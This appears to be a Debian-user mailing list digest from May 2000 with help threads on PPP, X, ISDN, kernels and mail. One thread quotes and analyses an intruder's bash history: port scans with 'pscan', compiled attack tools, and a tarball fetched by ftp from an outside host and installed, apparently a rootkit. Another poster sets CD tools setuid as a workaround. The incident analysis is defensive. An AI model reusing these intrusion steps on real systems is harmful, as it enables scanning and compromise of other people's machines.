> You can setup a user on the "server" so that when the user logs in, pppd
> would be started; in /etc/passwd:
> pppuser:...:/usr/local/bin/ppplogin
> in which ppplogin basically a script that starts pppd:
> /usr/sbin/pppd file /etc/ppp/options
> On the client machine, set a ppp connection up with a self-written chat
> script; the script handles the login: and password: prompts.

I tried something slightly simpler.  I used bash as the shell and tried to
start pppd manually over the serial connection.  This might mean something:

in minicom:
bolverk:/etc/ppp# pppd noauth
(hangs)

in an eterm on bolverk:
bolverk:/home/odin# pppd noauth
~ÿ}#À!}!}!} }4}"}&} } } } (etc.)

The latter looks right, but why on earth does it work and not the former?

I copied my /etc/ppp/options file to /etc/ppp/options.ttyS1 to make sure
there weren't weird differences in how it was being started even.

For some reason, pppd just won't chatter over my serial ports... it's quite
confusing.

> If you have a network card on your laptop, it would be nice; you can setup
> IP alias feature on the kernel so that you can monitor both machines with
> ease (you don't have to go back and forth between them). Just use a
> network number for the ethernet and another for the ppp link.

I wish.  I have a network card coming by mail order (about a week-1/2 to
deliver).  If I had it already, I wouldn't care about setting up pppd.  I
just want to install software and get the laptop usable sooner rather than
later.  It seems a waste to have such a nice machine with only the base
system on it.

Thanks for your help.

-Dan

-- 
"Beware he who would deny you access to information, for in his heart 
he dreams himself your master."


pgpuVyT3eNUkL.pgp
Description: PGP signature


grip and cdparanoia, must run suid?

2000-05-03 Thread Kenneth Scharf
I installed grip, but I can't run in unless I am root
(sudo, or suid).  The error I get is 'can't access cd
rom drive'.  My /dev/scd1 is owned by root, group is
cdrom.  The drive is actually on /dev/hdc physically
but I am running scsi-ide emulation.  I also have a
'real' scsi cdrom that is /dev/scd0.  I added myself
to the cdrom group (edited /etc/group as root) and
logged out and back in as myself.  No joy, still can't
run grip or cdparanoia (actually it was cdparanoia
that issued the error message).  I did chmod +s on
cdparanoia and grip and then it worked.  But I should
be able to access the cdrom if I'm in the cdrom group?
 I can access my /dev/dsp device by adding myself to
the audio group (I don't think xmmm is suid, I can run
it as a user in the audio group).
Ideas?


=
Amateur Radio, when all else fails!

http://www.qsl.net/wa2mze

Debian Gnu Linux, Live Free or .



__
Do You Yahoo!?
Send instant messages & get email alerts with Yahoo! Messenger.
http://im.yahoo.com/


apt-get interrupted download

2000-05-03 Thread Johann Spies
I have a dialup ISP-connection.  Using apt-get source
kernel-source-2.2.14 to download the kernel source was interrupted
after more than 8 meg.  When I started it again just now, apt-get
started again from byte 0.  Why?  In the past it would just resume
from where the download was interrupted.

Johann
-- 
J.H. Spies, Hugenotestraat 29, Posbus 80, Franschhoek, 7690, South Africa
Tel/Faks 021-876-2337 Sel/Cell 082-255-2388
 "Rejoice with them that do rejoice, and weep with them 
  that weep."Romans 12:15 


Re: consultant

2000-05-03 Thread Vitux
Rob Lilley wrote:
> 
>Part 1.1Type: Plain Text (text/plain)
>Encoding: quoted-printable

Please post in plain text. This html-mail-stuff is a PITA.
Vitux

-- 
"I'm not a crook"
Richard Nixon

Debian GNU/Linux
Micro$loth-free Zone


Re: kernel upgrade

2000-05-03 Thread Vitux
UMUM wrote:
> 
> Is it safe for me to upgrade to Linux kernel 2.2.14 yet?
> 
> I've just upgraded from slink/stable to potato/frozen, but kept my old
> 2.0.38 kernel.
> 
> Thanks in advance.
> 
> Urip Hudiono
> --
> Bandung, Indonesia
> 
> --
I'd say it would be h*** of a good idea to upgrade your
kernel. Running 2.2.14 myself, I find it very stable, and very
fast. Also, some of the older kernels are known to have a
fs-corruption bug (there was a thread about it a few days
ago).
HTH
Vitux

-- 
"I'm not a crook"
Richard Nixon

Debian GNU/Linux
Micro$loth-free Zone


Re: smartlist headers

2000-05-03 Thread Santiago Vila Doncel
On Tue, 2 May 2000, Dan Brosemer wrote:

> On potato, smartlist adds "Resent-To:" headers which list all the people
> subscribed to the list on every outbound message.
> 
> Can this be removed?

Yes, please read /usr/doc/smartlist/README.exim.

> I tried with the following (and enabled RC_LOCAL_SUBMIT_20):
> 
> dev:/var/list/testing# cat rc.local.s20
> # remove headers
> 
> :0 fhw
> | formail -I Resent-To:
> 
> but no luck.  I guess rc.local.s20 is executed before the Resent-To gets
> added.

Indeed, since it's exim the one who adds it :-)

In fact, if you want exim not to do that (and you don't follow
README.exim), you would have to actually *provide* a valid Resent-To:
header so that exim does not add one.

Thanks.


consultant

2000-05-03 Thread Rob Lilley




I am seriously thinking of changing my WinNT LAN 
at work to Linux.  There are connectivity issues, etc.  I am seeking 
an Linux consultant in Northeast NJ.  Please email if interested or know of 
anyone/company.  
 
I would rather deal with an individual than a 
company.  My experience with computer support companies is that they send 
the two slick guys dressed in suits to land the account.  After the account 
is established, follow-up visits are made by bored college students who show up 
at 4:00 PM, leave appropriate software back at the office and end up borrowing 
your screwdriver.  Perhaps this does not happen with Linux support 
.
 
Rob


Re: Potato iso

2000-05-03 Thread Fabio Massimo Di Nitto
Emilis wrote:
> 
> Can i get potato iso somewhere?

Yes, you can find them here:

ftp://gusp.infogroup.it/pub/debian/debian-cd

Pay attention. Potato is still not stable and CD's on this site
are re-generated each week so you may be lucky to find them working
or not.


> And, does 2.2.14 kernel supports UDMA66 ?

i'm not sure but you can find patch for 2.2.14 to support UDMA66
anyway on www.kernel.org you'll find something for sure.

-- 
 _  ___  ____  ___  ___  _  __  _  _  __  _
|_   _||  _|| |  |  _||  _|| _ || \/ |  | ||_   _||  _  || |  | ||  _  |
  | |  |  _|| |_ |  _|| |_ | _ || \/ |  | |  | |  |  _  || |_ | ||  _  |
  |_|  |___||___||___||___||___||_||_|  |_|  |_|  |_| |_||___||_||_| |_|
[EMAIL PROTECTED] - South European @ccess Back Bone
 -- http://www.seabone.net/ ---
  Fabio Massimo Di Nitto   | Debian GNU/Linux Woody 2.2.14
  mailto:[EMAIL PROTECTED] | running on
  mailto:[EMAIL PROTECTED]  |  Laptop AMD K6-2 400Mhz 64Mb


php3-mode for xemacs

2000-05-03 Thread martin
short question: does anyone know of a php3 mode for xemacs?

developing php3 in html-mode is sort of annoying :-)

tnx
-- 
Cynapsis Kommunikationsagentur GmbH
Dipl.-Ing. Martin Lorenz
Application Consultant und Tool Acquisition

Tel: +49 251 48265 24
Fax:   48
Rothenburg 14-16
D-48143 Muenster


arpwatch and the never Ending Syslog

2000-05-03 Thread Andresito del Hierro

Hallo!

After I installed arpwatch the syslog grows and grows and grows!
then I looked to the init.d script and found that the ARGS option
is set at "" by default. Would be better to have it set to 
"-b" by default?.
I read the init script of arpwach.  the "ARGS" is declared at
the top but get not used in the "case" anywhere.
The line on the script is:

  start-stop-daemon --stop --quiet --exec $DAEMON

Is this line correct or is lacking something?
then the line, I guess, should be (I am a biologist, then do not 
expect much about me)

 start-stop-daemon --stop --quiet --exec $DAEMON -- $ARGS

Regards
Andres
PS please cc to me I'm not in the list.
-- 

 Boku -- BOTANIK
Univeritaet fuer Bodenkultur
Gregor Mendel Str 33
WIEN  AUSTRIA  A1180
--
The ultimate result is that some innovations that would truly benefit
consumers never occur for the sole reason that they do not coincide with
Microsoft's self-interest.
-- Judge Thomas Penfield Jackson, U.S. District Judge
 _


Potato iso

2000-05-03 Thread Emilis
Can i get potato iso somewhere?
And, does 2.2.14 kernel supports UDMA66 ? What kernel will goes with 
potato ?
Thanx
Emilis



Re: Passing an input file through mail.

2000-05-03 Thread Eric G . Miller
On Wed, May 03, 2000 at 04:30:16PM +0800, Corey Popelier wrote:
> Heres the deal - I dial into my ISP, and get allocated a random IP
> address, ie. I do not have a static IP, and cannot obtain one with my
> current ISP.
> 
> What I would like to do, is on dialing in, pipe my ifconfig ppp0 to a
> file, and mail that to my work address as follows:
> 
> ifconfig ppp0 > ipaddy
> mail -s IP [EMAIL PROTECTED] < ipaddy
> 
> Doing this, according to my sendmail logs, generates a Data Format
> Error. Any way I can achieve this using the above approach, or is there a
> better alternative I am not aware of?

I did something similar, with a check for the time of day and weekday.
Then I put it in /etc/ppp/ip-up.d. I'm a lousy shell scripter, but this
works:
---
#!/bin/sh

DAY=`date +%w`
HOUR=`date +%H`

if test "$DAY" -gt  0 -a "$DAY" -lt 6 -a "$HOUR" -gt 7 -a "$HOUR" -lt 17
then
/sbin/ifconfig ppp0 | mail -s IP  [EMAIL PROTECTED]
fi
--
With the "persist" option to ppp, if the link goes down, it'll get
restarted, and you'll get a new mail at work with the IP address.  You
can use a cron job to start/stop the link during working hours.  I used
to use this for transferring files until I hijacked an unused Jaz drive
(my work doesn't provide any remote access 'cause the IT management is
lame.)  If you want to be tricky, you can parse the IP address first.
More trouble than it's worth, IMHO.

-- 
¶ One·should·only·use·the·ASCII·character­set·when·compos­

» ing·email·messages.



Re: XF4.0 Modelines?

2000-05-03 Thread Roso Giuseppe \(Beppe\)


On Tue, 2 May 2000, Dan Brosemer wrote:

> My typical strategy for configuring X is to go through xf86config and then
> try to start X many times deleting modelines from the XF86Config file when
> they fail (my monitor stays black).  This worked great for all of the 3.3
> series.
> 
> I compiled XF86 4.0 and installed it, but when I tried this, I found that
> there were no modelines in the XF86Config file.  A search of xfree86.org
> yeilds nothing helpful, I was wondering if someone could tell me what
> happened to them or offer a better way of getting X working.
> 
> I have a Permedia 2 based reference board and a GoldStar Studioworks 78i
> monitor.  Entering the specs for the monitor (hsync and vrefresh) leave me
> with a blank screen (and the monitor in sleep mode) with both XF4.0 and
> 3.3.x.
> 
> TIA
> 
> -Dan
> 
> -- 
> "Beware he who would deny you access to information, for in his heart 
> he dreams himself your master."
> 
I have read that Xserver 4.0 is configured by using XF86Setup (it is
considered old xf86config). it doesn't use modeline becuase it autodetect
standard vesa modes of plug&display of the monitor. If you have an old
monitor you need to save the modelines of an old XF86conf of 3.3.X
Xservers and insert them in your new XF86conf (the new XServer 4.0 should
use them).

Good Luck.

 Beppe.


fsync error while upgrade

2000-05-03 Thread jure . buble
Hi,
 
can enyone help me with the following error which i get when i run:
apt-get upgrade

Reading Package Lists... Done
Building Dependency Tree... Done
The following packages have been kept back
  ae bc exim gettext kbd libnet-perl librpm1 login lynx mc mtools netbase
  netstd nfs-server passwd perl perl-base ppp pppconfig rpm samba samba-common
  shellutils slang1 swat sysvinit util-linux whiptail
21 packages upgraded, 0 newly installed, 0 to remove and 28 not upgraded.
Need to get 0B/8938kB of archives. After unpacking 280kB will be used.
Do you want to continue? [Y/n] y
(Reading database ... 9602 files and directories currently installed.)
Preparing to replace dpkg 1.6.12 (using .../dpkg_1.6.12.99_i386.deb) ...
dpkg: error processing /var/cache/apt/archives/dpkg_1.6.12.99_i386.deb (--unpack
):
 unable to fsync updated status of `dpkg': Input/output error
Errors were encountered while processing:
 /var/cache/apt/archives/dpkg_1.6.12.99_i386.deb
Processing was halted because there were too many errors.
E: Sub-process /usr/bin/dpkg returned an error code (1)
 
 
Sincearlly Jure


Get your free email from AltaVista at http://altavista.iname.com


Passing an input file through mail.

2000-05-03 Thread Corey Popelier
Heres the deal - I dial into my ISP, and get allocated a random IP
address, ie. I do not have a static IP, and cannot obtain one with my
current ISP.

What I would like to do, is on dialing in, pipe my ifconfig ppp0 to a
file, and mail that to my work address as follows:

ifconfig ppp0 > ipaddy
mail -s IP [EMAIL PROTECTED] < ipaddy

Doing this, according to my sendmail logs, generates a Data Format
Error. Any way I can achieve this using the above approach, or is there a
better alternative I am not aware of?

Cheers,
 Corey Popelier
 http://members.dingoblue.net.au/~pancreas
 Work Email: [EMAIL PROTECTED]



Re: How to configure X?

2000-05-03 Thread John Bagdanoff
If this is a slink install, then you'll have to upgrade
XFree.  Visit:

http://www.debian.org/~vincent

John

on Tue, May 02, 2000 at 11:52:08PM -0700, Eduardo Hidalgo Contreras wrote:
> Hello, I have just installed debian GNU/Linux. I selected the 
> Workstation_Comp or something like that so I could get some packages 
> installed and not have to use the [S]elect step in dselect. I thought it 
> would install everything I need for X Window, but I guess not... I can't 
> run it.
> 
> I allready ran XF68Setup, as well as xf86config, and I also downloaded and 
> installed the correct drivers for my graphics card (Diamond Viper V770 
> Ultra). I have configured and installed those drivers in other Linux 
> distributions (Red Hat 6 and Slackware 7), but I can't do it in Debian.
> 
> When I use startx I errors like: "_X11TransSocketUNIXConnect: Can't 
> connect: errno = 111
> and after that some errors about "directory not found".
> 
> I also downloaded all the xf86_servers, that is: svga, vga16, mono, etc, 
> etc, etc...
> 
> Thanks for all your help.
> 
> /*
>   ***
>   * Eduardo Hidalgo Contreras (Azteca).
>   * [EMAIL PROTECTED]  [EMAIL PROTECTED]
>   * Tijuana, B.C., México.
>   * "¡Hasta la Victoria Siempre!" - Ernesto "Che" Guevara
>   
> */
> 
> 
> -- 
> Unsubscribe?  mail -s unsubscribe [EMAIL PROTECTED] < /dev/null
> 


Re: bash_history from Cracked Computer

2000-05-03 Thread w trillich
Joey Hess wrote:
> Let's cut it down some..
> 
> > cc anatomy.c -o anatomy
> > cc kod.c -o kofd
> > cp kofd kod
> > rm kofd
> 
> According to google, kod and kofd are related to the oracle database.
> It's possible this is a cooincidence, or he was using these names to try
> to appear innocous (weird choices though; 'sh' is better..)
> 
> It's odd he made them and immediatly deleted them -- unless he was
> logged in twice and went and used them in between.

looks to me like he mistyped (fat left index finger can
produce 'kofd' when you're trying for 'kod') and instead of
rename (mv) he did cp then rm.

not that this'll help much, but it might cut down on wild-goose
chasing...


Re: PPP over null modem

2000-05-03 Thread Oki DZ


On Tue, 2 May 2000, Dan Brosemer wrote:

> I'm trying to install potato over a PPP connection between a laptop with no
> network card (hermod) and a desktop with ethernet (bolverk).
> 
> I can communicate over the null modem between machines with minicom no
> problem.
> 
> hermod:~# pppd -detach /dev/ttyS0 57600 192.168.5.2:192.168.5.1 crtscts
> debug noauth
> bolverk:~# pppd -detach /dev/ttyS1 57600 192.168.5.1:192.168.5.2 crtscts 
> debug noauth

You can setup a user on the "server" so that when the user logs in, pppd
would be started; in /etc/passwd:
pppuser:...:/usr/local/bin/ppplogin
in which ppplogin basically a script that starts pppd:
/usr/sbin/pppd file /etc/ppp/options

On the client machine, set a ppp connection up with a self-written chat
script; the script handles the login: and password: prompts.

If you have a network card on your laptop, it would be nice; you can setup
IP alias feature on the kernel so that you can monitor both machines with
ease (you don't have to go back and forth between them). Just use a
network number for the ethernet and another for the ppp link.

Oki




Debian ISDN connection configuration prob

2000-05-03 Thread Alain Bosch

Hi,

Can someone help get out of my ISDN potato configuration
problems?

I made the following changes


device.ippp0:
LOCALMSN=  4 last number of the caller
REMOTEMSN= ISP phone number


LEADINGZERO=''

I have entries in chap-secrets et pap-secrets, these
entries were created with pppconfig.

The resolv.conf files is ok, the ethernet inferface is
properly configured.

What i do not understand is when i try to connect, i m
being disconnected after the timeout.

How do i tell ipppd which provider to use?

Do i have to connect with '/etc/init.d/isdnutils start'?

Thanks for your help.

Remark:

* it's working under NT, so the hardware and cabling are ok


aha1520 scsi card

2000-05-03 Thread Paul

I have picked up an Adaptec aha1520 and installed it into my computer.
I build a new kernel with module support for aha152x and did all the isapnp
stuff to probe the card... 

With isapnp I set the card to io: 0x340   irq: 11

But when modprob aha152x with the required parameters it fails to insert the
module.

So I tried building the support into the kernel, this did not work either.

Can someone help me get this going or tell me where I can find information on
getting this particular card working in linux?

Thanks
Paul


How to configure X?

2000-05-03 Thread Eduardo Hidalgo Contreras
Hello, I have just installed debian GNU/Linux. I selected the 
Workstation_Comp or something like that so I could get some packages 
installed and not have to use the [S]elect step in dselect. I thought it 
would install everything I need for X Window, but I guess not... I can't 
run it.


I allready ran XF68Setup, as well as xf86config, and I also downloaded and 
installed the correct drivers for my graphics card (Diamond Viper V770 
Ultra). I have configured and installed those drivers in other Linux 
distributions (Red Hat 6 and Slackware 7), but I can't do it in Debian.


When I use startx I errors like: "_X11TransSocketUNIXConnect: Can't 
connect: errno = 111

and after that some errors about "directory not found".

I also downloaded all the xf86_servers, that is: svga, vga16, mono, etc, 
etc, etc...


Thanks for all your help.

/*
 ***
 * Eduardo Hidalgo Contreras (Azteca).
 * [EMAIL PROTECTED]  [EMAIL PROTECTED]
 * Tijuana, B.C., México.
 * "¡Hasta la Victoria Siempre!" - Ernesto "Che" Guevara
 
*/


Re: Help with apachie

2000-05-03 Thread Brian Schramm
How do I point the htaccess file at it so it knows where to look for the
password?

Brian Schramm
[EMAIL PROTECTED]
www.linuxexpert.org

 
On Tue, 2 May 2000 [EMAIL PROTECTED] wrote:

> Hi Brian,
> I think your looking for this: 
> 
>   [timberwolf:someuser:/$]> htpasswd 
>   Usage: htpasswd [-c] passwordfile username
>   The -c flag creates a new file.
> 
> ie.. htpasswd -c passwd.www username
> 
> 1. Ensure it is NOT world readable.
> 2. Make sure it is NOT in any web viewable directory.
> 
> Enjoy!
> 
> 
> -Robert MacQuarrie
> 
> 
> 
> On Tue, 2 May 2000, Brian Schramm wrote:
> >I am running Debian Slink.  I would like to know how to re-create the 
> >htaccess password
> >file that I deleted at som point.  I know it is simple but I cannot find the 
> >info anywere
> >including Apachie site.  I ran htpasswd -b .password username password but 
> >that did not fix it.
> >
> >Can anyone help?
> >
> >Thanks.
> >
> >Brian Schramm
> >[EMAIL PROTECTED]
> >www.linuxexpert.org
> 
> 


RE: CDE for Linux?

2000-05-03 Thread gsublett

On 03-May-00 Kevin A Smith wrote:
> 
> Is CDE available for LINUX?
> 
> Where would I find information about it?
> 
> Is it that much better than KDE?
> 
> Kevin Smith
> TNT/APX Engineering email: [EMAIL PROTECTED]
> Lucent Technologies pager: [EMAIL PROTECTED]

See

http://www.xigraphics.com/Pages/maXimum_cde_ProductsPage.html

or an excellent GPL'd substitute

http://www.xfce.org
--
Gary


Re: bash_history from Cracked Computer

2000-05-03 Thread Matthew Dalton
"Dzuy M. Nguyen" wrote:
> This linux box was plugged into the same LAN as our company NT Network.
> It wasn't setup to access the NT Network or be involved in it.  It just
> get's
> it's TCP/IP signal from the LAN.

And what about the internet connection? Are all of your NT boxes
connected directly to the internet? Is there any sort of firewall
protecting them?

Of course, I'm assuming that the cracker came in from the outside. He
might just as well have broken in from the inside.

> My question is could this cracker get access to our NT Network from this
> linux box?  Could he have scanned the ports of the computers physically
> connected on this LAN?  Should I be concerned with the security of the
> whole office now?

If there's no firewall, a cracker might get access to your NT network
regardless of whether the linux box is there or not.


Re: bash_history from Cracked Computer

2000-05-03 Thread Dzuy M. Nguyen
This linux box was plugged into the same LAN as our company NT Network.
It wasn't setup to access the NT Network or be involved in it.  It just
get's
it's TCP/IP signal from the LAN.

My question is could this cracker get access to our NT Network from this
linux box?  Could he have scanned the ports of the computers physically
connected on this LAN?  Should I be concerned with the security of the
whole office now?

- Original Message -
From: w trillich <[EMAIL PROTECTED]>
To: 
Sent: Tuesday, May 02, 2000 6:58 PM
Subject: Re: bash_history from Cracked Computer


> if you run updatedb via cron (or run it from the shell by hand
> recently) it'll tell you if you have any of the evil files
> on your computer:
> locate pscan
> locate wuftp
> locate bnc2
> locate .shit
> locate anatomy
> locate kod
> locate '/b$'
> if you find any source files (*.c or *.pl) consider finding a
> debian guru to hand them to in case this kind of thing can be
> snuffed in the future. might help, you never know.
>
>
> here's my run thru the command history...
>
> >cd /
> >cd home
> >cd .dead
> >mkdir .dead
> >cd .dead
>
> somehow, your invader transferred some files here into
> the /home/.dead/ at this point. must've used his own
> ftp client, meaning he used your server--on my debian
> box the FTP transfers are logged in
>
> /var/log/xferlog
>
> see if you've still got yours. it might help.
>
> >cc anatomy.c -o anatomy
> >cc kod.c -o kofd
>
> i'd guess that 'anatomy' scans your directory tree
> and reports it back to the IP supplied as its
> command-line argument. or it may copy everything.
> maybe it scans the structure of the remote site.
> don't know. (you may still have the source code;
> if so, it might be helpful to hand it off to
> some of the C++ gurus around here so they can
> wedge it out of existence...)
>
> >cp kofd kod
> >rm kofd
>
> hmm! he never directly called kod, but some of the other
> programs may have.
>
> >cd home
> >cd httpd
> >cd icons
> >cd small
> >cd .shit
>
> looks like cut & paste, and maybe the last two didn't take.
>
> >mkdir small
> >cd small
> >mkdir .shit
> >cd .shit
>
> so i guess he's now at /home/httpd/icons/small/.shit
>
> >who
>
> unless there's a logout and login to another directory,
> more files were transferred here somehow.
>
> >chmod 777 *
> >chmod +s *
> >chmod 666 *
> >chmod 777 *
> >./pscan
> >./b
> >./pscan 167.64 111
>
> and it looks like PSCAN does a whole zone at a time.
> to what end, i don't know.
>
> down a bit, there's
>
> >./pscan 198.138 111
> >cat wuftp.log
> >rm wuftp.log
> >./pscan 198.59 111
> >cat wuftp.log
>
> so the PSCAN program creates "wuftp.log" i guess.
>
> of course, he zapped it before checking out.
> i'd bet it was in home/httpd/icons/small/.shit/
> along with some other files... may still be there.
>
> seemed to run the PSCAN on an ip net range, then check
> the wuftp log file, apparently to get other IP ranges
> to scan. ?
>
> (you might try seeing if there's any left on the system.
> may be informative.)
>
>
> now THIS part i would consider very bad news:
>
> >ftp columbia.digiweb.com
> [obviously transferring linux kernel here]
> >tar -zxvf linux.tar.gz
> >cd .bd
> >./install
>
> (i know, it's all bad news, but some is badder than others.)
>
> there's also a
> >telnet 198.150.93.205
>
> which reports as nonexistent just now, so it's probably a
> transient or dynamically-allocated ppp-like address.
>
> ===
>
> to find the where the IP's are he/she was interested in,
> (in case it helps any, or you want to contact their
> sysadmins) i did this in tcsh:
>
> % grep anatomy bash_history.txt | cut -f2 "-d "
> 216.209.196.154
> 216.209.205.68
> 216.209.207.150
> 212.1.128.61
> 212.1.128.61
>
> % foreach x(`!!`)
> foreach x ( `grep anatomy bash_history.txt | cut -f2 "-d "` )
> foreach? nslookup $x
> foreach? end
>
> Name:HSE-Montreal-ppp33164.qc.sympatico.ca
> Address:  216.209.196.154
>
> Name:HSE-Montreal-ppp35364.qc.sympatico.ca
> Address:  216.209.205.68
>
> Name:HSE-Quebec-City-ppp35954.qc.sympatico.ca
> Address:  216.209.207.150
>
> Name:cache-1.www.telinco.net
> Address:  212.1.128.61
>
> Name:cache-1.www.telinco.net
> Address:  212.1.128.61
>
>
>
> maybe he/she had some friends in canada...?
>
>
>
> and for the "./b" program:
> foreach x ( `grep /b bash_history.txt | cut -f2 "-d " | sort | uniq` )
> foreach? nslookup $x >> bash_crack
> foreach? end
> *** localhost can't find 156.26.120.34: Non-existent host/domain
> *** localhost can't find 192.203.80.144: Non-existent host/domain
> *** localhost can't find 198.150.93.205: Non-existent host/domain
> *** localhost can't find 198.247.5.164: Non-existent host/domain
> *** localhost can't find 204.116.202.5: Non-existent host/domain
> *** localhost can't find 204.185.91.12: Non-existent host/domain
> *** localhost can't find 206.252.255.42: Non-existent host/domain
> *** localhost can't find 208.135.205.67: Non-existent host/domain
> *** localhost can't find e150.135.112.129: Non-exis

CDE for Linux?

2000-05-03 Thread Kevin A Smith
Is CDE available for LINUX? 

Where would I find information about it?

Is it that much better than KDE?



Kevin Smith

TNT/APX Engineering email:
[EMAIL PROTECTED]   

Lucent Technologies pager:
[EMAIL PROTECTED] 



Re: help outlook /outlook express

2000-05-03 Thread Andrew Weiss
on 5/2/00 10:35 PM, Touloumtzis, Michael at [EMAIL PROTECTED]
wrote:

> On Tue, May 02, 2000 at 07:41:32PM -0400, Robert Rossmoore wrote:
>> hi i have outlook and outlook express is there a way to use just outlook to
>> send and receve mail from thatplease advise
> 
> Hard to be sure what you're asking, but I'll guess that the question is
> this (and if not maybe someone else will want to hear the answer ;-):
> "How can I read MS-Exchange mail using Debian Linux instead of MS-Exchange
> or Outlook clients?"
> 
> The company I work for uses MS Exchange with most folks (except me :)
> using MS Exchange or MS Outlook clients.  Our Exchange server supports
> POP3, so I just use fetchmail to download the mail to my Debian potato box
> (every 2 hours during the night, and every 10 minutes during work hours).
> For outgoing mail I use our standard SMTP mail host.  For a mail client
> I use mutt.  All works okay, except for some MS-specific stuff like
> ..doc format attachments and the tnef mail format (vs. generic MIME).
> All these have turned out to be things that can be worked around 99.9%
> of the time with StarOffice, tnef2txt, etc.  I can use a Win95 machine
> for the exception cases when all else fails.
> 
> So ... see if your system has POP3 download capability and SMTP sending
> capability.  If so you're in business and the details can be worked out.
> 
> - Mike Touloumtzis
> 
> P.S. - One reason I use this setup (besides generally preferring Linux)
> is that the mutt mail client makes reading mail lists like this one much
> easier that would be the case with the standard MS mail clients.
You can also use Outlook Web Access if it is installed and configured
properly on the Exchange Server.

Andrew


Re: kernel upgrade

2000-05-03 Thread Corey Popelier
In my opinion kernel 2.2.14 is quite safe, and there has been little
report of the problems that appear to have plagued the previous 2.2.x
kernels. I upgraded straight to 2.2.14 and had no problems, and am now
running 2.2.15pre19-1 with no problems either.

Cheers,
 Corey Popelier
 http://members.dingoblue.net.au/~pancreas
 Work Email: [EMAIL PROTECTED]

On Wed, 3 May 2000, UMUM wrote:

> Is it safe for me to upgrade to Linux kernel 2.2.14 yet?
> 
> I've just upgraded from slink/stable to potato/frozen, but kept my old
> 2.0.38 kernel.
> 
> Thanks in advance.
> 
> Urip Hudiono
> --
> Bandung, Indonesia
> 
> 
> -- 
> Unsubscribe?  mail -s unsubscribe [EMAIL PROTECTED] < /dev/null
> 


kernel upgrade

2000-05-03 Thread UMUM
Is it safe for me to upgrade to Linux kernel 2.2.14 yet?

I've just upgraded from slink/stable to potato/frozen, but kept my old
2.0.38 kernel.

Thanks in advance.

Urip Hudiono
--
Bandung, Indonesia


Re: Emacs - was Re: Mail/news software

2000-05-03 Thread Pat Mahoney
On Mon, May 01, 2000 at 09:17:30PM -0700, Eric G . Miller wrote:
> I feel compelled to respond...
> 
> On Mon, May 01, 2000 at 10:15:37PM -0500, Pat Mahoney wrote:
> > Linux[1] is much more difficult (to learn anyway) yet much more
> > powerful than, say, windows. The Windows philosophy is: "don't think,
> > everything should be easy." With linux, you must think. The windows
> > philosophy seems to rub off onto the rest of one's life (or maybe it's
> > the other way around). Some people don't like to think, and windows
> > encourages this.
> 
> I strongly disagree with this characterization.  The difference between
> Windows and Linux has nothing to do with whether people like to "think".
> I think perfectly well while I'm at work in front of a NT box. The
> windows approach tries to give you a helping hand to get things done.
> Unfortunately, it often can't get out of it's own way and becomes more
> *difficult* to use.  If you apply yourself to Windows, you can learn how
> to do a great many complex tasks.  Unixes in general have this CLI

True. I guess my free software bias got the best of me. I'd like to see
everyone using free software. But, on linux, I can use CLI or GUI for many
things. Unfortunately, not everything, and especially not most sysadmin
stuff is availible as a gui. I think this freedom of choice is very
important and I don't see Windows 9x or NT giving this, although I have zero
experience with NT. But I do know that to kill a runaway process in Win95
you have to Ctrl-Alt-Delete, wait for the little window to pop up (forgot
what it's called), and click on it and tell Windows to close the program.
Typing 'kill' seems so much simpler. The point, I guess, is the same as
yours: both CLI and GUI have pros and cons. I like my linux box where both
are often available. (you say that further down too.)

> heritage and the idea of breaking down software into reusable chunks
> that can be piped together (COM/ActiveX addresses the same idea in a
> different way).  CLI programs are quite useful at times, but just as
> often such programs are too damn complicated for their own good. Sure
> you can run it from a shell script, but first you have to figure out 500
> switches and all of their arguments.  The interface should be
> appropriate to the task at hand.  There are things to like and dislike
> about any computer system.  This difference with Linux is the end user
> can exert some direct influence on how the system evolves.  This, is the
> key difference.  
> 
> > Linux, on the other hand, makes and encourages you to think.
> > Hopefully, this will rub off onto the rest of your life and make you a
> > better person. Yes, Linux can make you a better person.
> > 
> > Unfortunately, laziness and non-thinkers are not going anywhere.
> > That's why kde and gnome and the like are important. If you don't want
> > to think, you don't have to. But if you do, there's always the command
> > line, waiting, beckoning. Kde and gnome will allow those people to use
> > free software and still not get too frustrated. I admit to being like
> > this. I don't have time to learn how to get latex to print a custom
> > header for my picky english teacher when it's 1:00 a.m. and an essay's
> > due tommorrow. I just want to fire up a gui/wsiwig and click on
> > "headers & footers."
> 
> After using both GUI wordprocessors and LaTeX for some time, I'm riding
> the fence on this one.  A well designed GUI can make it easy to perform
> complex tasks.  The big benefit of TeX/LaTeX is it's nice typesetting
> and structure (not to mention math) and it's portability.  How you going
> to read that Word file in ten years?  There is nothing inherently better
> or worse about GUI's vs. CLI.  It's a matter of choosing the right tool,
> and providing an appropriate interface. The king of all designs is that
> which can do both (such as through shared libs).  We see alot of that
> with things like mpg123/xmms. Kind of a best of both worlds approach.
> Make it possible to run from a CLI (or shell script), but present a
> pleasant GUI interface for day-to-day ease of use.  From an end user's
> perspective, it doesn't have a lot to do with "thinking" vs. "not
> thinking", it has to do with getting the job done.
> 
> > But I have chosen to use linux; I like the free software attitude, and I 
> > want
> > to be encouraged to think. The most fun I ever had was when my brother
> > and I fdisk'ed our windows partition and mke2fs'ed it. Then we broke
> > the windows install CD so that no one else would ever install it from
> > that CD.
> > 
> > [1] When I say linux, I mean Debian, GNU, latex etc., etc.
> 
> 
> 
> -- 
> ¶ One·should·only·use·the·ASCII·character­set·when·compos­

> » ing·email·messages.

> 
> 

-- 
Dare to be naive.
-- R. Buckminster Fuller


Re: XF4.0 Modelines?

2000-05-03 Thread Dan Brosemer
Thanks to Felix Natter and yourself for your suggestions.

On Tue, May 02, 2000 at 04:51:23PM -0700, Eric G . Miller wrote:
> On Tue, May 02, 2000 at 07:53:20AM -0400, Dan Brosemer wrote:
> I just install the precompiled binaries Sunday.  You don't specify
> modelines anymore, yeah! It figures them out all by itself. The new
> xf86config should create a valid XF86Config file for you.  Beware, in
> the precompiled binaries, xterm doesn't handle ANSI colors properly.
> One of the Authors notified me that a patch to fix that problem didn't
> get in to the official release.

That's exactly my problem.  I need them.  With my setup, I need fine grained
control over what is getting sent to my monitor.  Just entering hsync and
vrefresh didn't work even for 3.3.x, there were still modelines (and all the
ones it was trying right off) that didn't work.

> > I have a Permedia 2 based reference board and a GoldStar Studioworks 78i
> > monitor.  Entering the specs for the monitor (hsync and vrefresh) leave me
> > with a blank screen (and the monitor in sleep mode) with both XF4.0 and
> > 3.3.x.
> Don't know anything about Permedia cards.  Did you check the supported
> drivers list? Look for suspect "Options" or modules that may cause
> problems.  The Xinstall.sh script warned about a couple (PEX, ??) when I
